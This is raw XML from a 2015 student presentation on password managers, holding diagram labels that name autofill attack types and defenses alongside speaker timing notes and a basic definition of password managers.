    <dgm:cxn modelId="{9F8971F7-3AA1-434A-B4C0-4C6D52C4B904}" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{6AC47D2C-5045-4AD1-8960-67B284A3830B}" srcOrd="5" destOrd="0" parTransId="{57967760-F36A-4FFE-A78D-39649EE1EB1E}" sibTransId="{E8B62B5C-118D-4EA7-8437-C5E7D7B6AE07}"/>
    <dgm:cxn modelId="{31B0D3DF-E3C9-48CB-8D1E-A01B655348ED}" type="presOf" srcId="{53D8BD2B-6706-4187-8082-1CBEFE3BC631}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A3764259-42EB-4069-88A1-72E3F8F936D8}" srcId="{429513C3-08D3-4440-900C-05F7655331C0}" destId="{C4C09287-B065-49A3-A939-A8E4AB6AAA7D}" srcOrd="1" destOrd="0" parTransId="{966EA029-80D0-480B-A527-61533E93B871}" sibTransId="{783B0DC4-91BF-40F3-9A09-6FBBC417B9C1}"/>
    <dgm:cxn modelId="{DB2B8531-B8B8-47C2-BD92-EA9249F91D9D}" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{3A12F5BB-AD83-49A5-96EC-FA304DB2520A}" srcOrd="4" destOrd="0" parTransId="{C5DA4A1D-6703-4B68-94B5-02B7347CAC23}" sibTransId="{33FC048D-3E50-4EB6-9C41-23167ED6B0E0}"/>
    <dgm:cxn modelId="{50526DA9-5641-45D0-8D3F-F70556081360}" type="presOf" srcId="{47F4A159-F8C5-467A-8A70-44123CD33D5F}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7A0087EA-E15F-468C-8E07-9CB4E8145AF8}" srcId="{C1887610-6404-4181-9F25-B4178E02923A}" destId="{429513C3-08D3-4440-900C-05F7655331C0}" srcOrd="1" destOrd="0" parTransId="{A3DB798A-343D-42EB-8B2A-F3705075E054}" sibTransId="{2CD6E947-0D04-4971-8FAF-8A613F03A719}"/>
    <dgm:cxn modelId="{96638981-A692-4E50-BDC4-CEABF126C527}" type="presParOf" srcId="{210D3F07-5AC0-480E-AD4C-0E694EAD317C}" destId="{CC7BA566-C681-4AD4-80FF-C959A93B6FC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7894F918-10A3-41FD-BECE-133F811F1D48}" type="presParOf" srcId="{210D3F07-5AC0-480E-AD4C-0E694EAD317C}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{236DAF44-5480-4718-BF16-27AFF9673E24}" type="presParOf" srcId="{210D3F07-5AC0-480E-AD4C-0E694EAD317C}" destId="{396D52DD-CE0B-49F9-8B8E-F843E53E84F3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{50AACCAF-9559-4326-9984-3CB67D2010AB}" type="presParOf" srcId="{210D3F07-5AC0-480E-AD4C-0E694EAD317C}" destId="{082CA9F6-4543-4608-A905-0593956F396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8B68F0-6DD5-4703-A512-52B0A046B11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249C2953-924A-4579-A913-59A6C34C87BF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Forcing User Interaction</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1529C4D7-6352-45B1-8509-31055A76A2AF}" type="parTrans" cxnId="{7B47AD00-B348-4FA3-AD65-B3E7221DBABD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF5A3E07-2434-44F8-B127-167637524E1C}" type="sibTrans" cxnId="{7B47AD00-B348-4FA3-AD65-B3E7221DBABD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98A1F785-7462-48EC-958B-81599B7A5CB1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Secure Filling</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2245CF06-07F3-47FE-BDB8-94914374D42A}" type="parTrans" cxnId="{ABC27FCA-9837-4F55-8E7C-E6E05664FA68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89727DC7-76F6-47E2-8B2C-33F1A9CB540D}" type="sibTrans" cxnId="{ABC27FCA-9837-4F55-8E7C-E6E05664FA68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56B28A3E-6FA4-4447-87C0-9D0D9904A8A6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Minimizing User Inconvenience</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0911076F-77BB-44B4-BD8B-6F0BE8BAB457}" type="parTrans" cxnId="{125427B0-065E-4828-BD18-25BFAAB72D3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{137013C8-0ADF-4684-B030-2A80FD52B805}" type="sibTrans" cxnId="{125427B0-065E-4828-BD18-25BFAAB72D3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D6B1725-BB6D-4BC7-8C6A-4C811D03F693}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Server Side Defenses</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C7A870B-FC1C-48F8-AC23-CD99B1F9800E}" type="parTrans" cxnId="{BFA71EB0-CFEC-4B53-8076-3CA0928573B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52E9ABAB-A776-4966-98C3-198775B69360}" type="sibTrans" cxnId="{BFA71EB0-CFEC-4B53-8076-3CA0928573B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" type="pres">
      <dgm:prSet presAssocID="{B48B68F0-6DD5-4703-A512-52B0A046B1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AB4FA86F-6008-419B-BE5E-0D8B3AEB18CB}" type="pres">
      <dgm:prSet presAssocID="{249C2953-924A-4579-A913-59A6C34C87B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93A6134B-13FF-4F42-BBA8-BF8ECBCA47EA}" type="pres">
      <dgm:prSet presAssocID="{CF5A3E07-2434-44F8-B127-167637524E1C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDE81887-BD68-4A02-B50F-2472D7345F9C}" type="pres">
      <dgm:prSet presAssocID="{98A1F785-7462-48EC-958B-81599B7A5CB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079AC2B3-5DBB-46D4-A759-A19D25E28EA1}" type="pres">
      <dgm:prSet presAssocID="{89727DC7-76F6-47E2-8B2C-33F1A9CB540D}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7785CA92-CC1C-4798-BFE4-415AEA708B26}" type="pres">
      <dgm:prSet presAssocID="{56B28A3E-6FA4-4447-87C0-9D0D9904A8A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F9CC2C98-667A-4E72-8AA9-F1274FCC5765}" type="pres">
      <dgm:prSet presAssocID="{137013C8-0ADF-4684-B030-2A80FD52B805}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0ABA09B0-9CFE-4EDD-9627-936A74EB7DDA}" type="pres">
      <dgm:prSet presAssocID="{0D6B1725-BB6D-4BC7-8C6A-4C811D03F69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3F8AA20F-0AB7-4448-AC66-352B3CE9711A}" type="presOf" srcId="{B48B68F0-6DD5-4703-A512-52B0A046B113}" destId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{9EE604DA-4D8D-4E58-B293-A7ADEE125883}" type="presOf" srcId="{98A1F785-7462-48EC-958B-81599B7A5CB1}" destId="{EDE81887-BD68-4A02-B50F-2472D7345F9C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{125427B0-065E-4828-BD18-25BFAAB72D3E}" srcId="{B48B68F0-6DD5-4703-A512-52B0A046B113}" destId="{56B28A3E-6FA4-4447-87C0-9D0D9904A8A6}" srcOrd="2" destOrd="0" parTransId="{0911076F-77BB-44B4-BD8B-6F0BE8BAB457}" sibTransId="{137013C8-0ADF-4684-B030-2A80FD52B805}"/>
    <dgm:cxn modelId="{7B47AD00-B348-4FA3-AD65-B3E7221DBABD}" srcId="{B48B68F0-6DD5-4703-A512-52B0A046B113}" destId="{249C2953-924A-4579-A913-59A6C34C87BF}" srcOrd="0" destOrd="0" parTransId="{1529C4D7-6352-45B1-8509-31055A76A2AF}" sibTransId="{CF5A3E07-2434-44F8-B127-167637524E1C}"/>
    <dgm:cxn modelId="{ABC27FCA-9837-4F55-8E7C-E6E05664FA68}" srcId="{B48B68F0-6DD5-4703-A512-52B0A046B113}" destId="{98A1F785-7462-48EC-958B-81599B7A5CB1}" srcOrd="1" destOrd="0" parTransId="{2245CF06-07F3-47FE-BDB8-94914374D42A}" sibTransId="{89727DC7-76F6-47E2-8B2C-33F1A9CB540D}"/>
    <dgm:cxn modelId="{5AEA2F69-8C86-442F-8FA1-05B8B6B16003}" type="presOf" srcId="{249C2953-924A-4579-A913-59A6C34C87BF}" destId="{AB4FA86F-6008-419B-BE5E-0D8B3AEB18CB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{4C380820-5E5F-41F8-B9AA-C11A36CF0268}" type="presOf" srcId="{56B28A3E-6FA4-4447-87C0-9D0D9904A8A6}" destId="{7785CA92-CC1C-4798-BFE4-415AEA708B26}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{BFA71EB0-CFEC-4B53-8076-3CA0928573B1}" srcId="{B48B68F0-6DD5-4703-A512-52B0A046B113}" destId="{0D6B1725-BB6D-4BC7-8C6A-4C811D03F693}" srcOrd="3" destOrd="0" parTransId="{9C7A870B-FC1C-48F8-AC23-CD99B1F9800E}" sibTransId="{52E9ABAB-A776-4966-98C3-198775B69360}"/>
    <dgm:cxn modelId="{3DCE2EAF-32DD-4D8A-9B65-F39461B3023E}" type="presOf" srcId="{0D6B1725-BB6D-4BC7-8C6A-4C811D03F693}" destId="{0ABA09B0-9CFE-4EDD-9627-936A74EB7DDA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D8669E96-497D-4382-B288-C16F9D234BE4}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{AB4FA86F-6008-419B-BE5E-0D8B3AEB18CB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{5373A003-3D29-4F5A-AE68-3F6E177C46D2}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{93A6134B-13FF-4F42-BBA8-BF8ECBCA47EA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{572DBE86-E8DD-482B-AC5E-181F8FCA6FB1}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{EDE81887-BD68-4A02-B50F-2472D7345F9C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{85155095-4C2F-46FB-AA8F-2EEB5C72C07A}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{079AC2B3-5DBB-46D4-A759-A19D25E28EA1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{0258497D-BF49-49A7-8712-878288E3FCE2}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{7785CA92-CC1C-4798-BFE4-415AEA708B26}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{B54C9589-B286-4C0C-9A4C-E62A8873383C}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{F9CC2C98-667A-4E72-8AA9-F1274FCC5765}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{13A53E9E-689D-4610-8E8E-16BF2A95F230}" type="presParOf" srcId="{FD0A338F-8456-4365-B0ED-878B0D362F4F}" destId="{0ABA09B0-9CFE-4EDD-9627-936A74EB7DD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A402B0-A341-4D51-83A0-4C952DA9C8DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="21300000">
          <a:off x="19954" y="1797440"/>
          <a:ext cx="6462491" cy="740052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88C8E6-DBF6-4141-BAAD-1412374959C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="780288" y="216746"/>
          <a:ext cx="1950720" cy="1733973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458632-1684-4865-AD3D-A449BB62CC29}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3446272" y="0"/>
          <a:ext cx="2080768" cy="1820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800" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Automatic</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3446272" y="0"/>
        <a:ext cx="2080768" cy="1820672"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CC92B480-D074-4B5E-A67C-8005E5DDE9ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3771392" y="2384213"/>
          <a:ext cx="1950720" cy="1733973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CE779-D119-4CE7-81B0-FE06D5AA570E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="975360" y="2514261"/>
          <a:ext cx="2080768" cy="1820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800" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Manual</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="975360" y="2514261"/>
        <a:ext cx="2080768" cy="1820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7BA566-C681-4AD4-80FF-C959A93B6FC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="122905"/>
          <a:ext cx="81280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600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="2600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31185" y="154090"/>
        <a:ext cx="8065630" cy="576450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="765104"/>
          <a:ext cx="8128000" cy="2098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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>HTTP login pages</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Embedded devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Broken HTTPS</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Active Mixed Content</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Leftover passwords</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="765104"/>
        <a:ext cx="8128000" cy="2098980"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{396D52DD-CE0B-49F9-8B8E-F843E53E84F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2864085"/>
          <a:ext cx="81280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600" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Extraction</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="2600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31185" y="2895270"/>
        <a:ext cx="8065630" cy="576450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{082CA9F6-4543-4608-A905-0593956F3964}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3502905"/>
          <a:ext cx="8128000" cy="104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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Stealth Methods</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Form Action</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA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CA" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Clickjacking</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3502905"/>
        <a:ext cx="8128000" cy="10494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4FA86F-6008-419B-BE5E-0D8B3AEB18CB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="992" y="206837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4300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Forcing User Interaction</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="4300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="992" y="206837"/>
        <a:ext cx="3869531" cy="2321718"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDE81887-BD68-4A02-B50F-2472D7345F9C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4257476" y="206837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4300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Secure Filling</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="4300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4257476" y="206837"/>
        <a:ext cx="3869531" cy="2321718"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7785CA92-CC1C-4798-BFE4-415AEA708B26}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="992" y="2915509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4300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Minimizing User Inconvenience</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="4300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="992" y="2915509"/>
        <a:ext cx="3869531" cy="2321718"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA09B0-9CFE-4EDD-9627-936A74EB7DDA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4257476" y="2915509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4300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Server Side Defenses</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" sz="4300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4257476" y="2915509"/>
        <a:ext cx="3869531" cy="2321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D5444-F62C-42C3-A75A-D9DBA807730F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/22/2015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F617-7A30-41D4-AB86-5D833C98E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AA1FA-7B6A-47D2-8D61-F225D71B51FF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/22/2015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A179D-2D27-49E2-B022-8EDDA2EF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23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LESS THAN 5 SEC – JUST STATE THEY ARE THERE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35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LESS THAN 5 SEC – BRIEF OVERVIEW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4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2.5 MIN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26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51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1 MIN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39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1 MIN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02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1 MIN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08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LESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> THAN 5 SEC – BRIEF OVERVIEW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57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LESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> THAN 5 SEC – BRIEF OVERVIEW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13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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> MIN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52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40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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" smtClean="0"/>
              <a:t> MIN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51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30 SEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- A password manager is a software application that helps a user store and organize passwords. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Also called a password vault or virtual safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Core functionality of a password manager is to securely store large collections of passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Usually store passwords encrypted, requiring the user to create a master password; a single, ideally very strong password which grants the user access to their entire password database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Some password managers store passwords on the user's computer, whereas others store data in the cloud. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CA" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
              <a:t>- Many provide additional features such as form filling and password generation.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06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1 MIN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79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30 SEC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3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1 MIN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78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1 MIN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78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1 MIN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09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30 SEC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72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273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>
          <a:xfrm>
            <a:off x="6412954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954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6" name="Instructional Text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sz="1200" b="1" i="1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sz="1200" i="1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79A3335-6331-4872-A8B7-ECD55539F4D0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/22/2015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youtube.com/watch?v=cqppD7Y6oZI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850" y="2734778"/>
            <a:ext cx="7251031" cy="963328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Password Managers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2850" y="4036795"/>
            <a:ext cx="5955631" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SME Project – Christopher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sigouin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>April 23, 2015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6" r="202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1820" y="255134"/>
            <a:ext cx="11539470" cy="1036850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-CA" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Advantages &amp; Disadvantages</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="6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648418"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1051560" y="1760220"/>
          <a:ext cx="10309860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4930"/>
                <a:gridCol w="5154930"/>
              </a:tblGrid>
              <a:tr h="446456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 smtClean="0"/>
                        <a:t>PRO’S</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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 smtClean="0"/>
                        <a:t>CON’S</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="2790350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Ease</a:t>
                      </a:r>
                      <a:r>
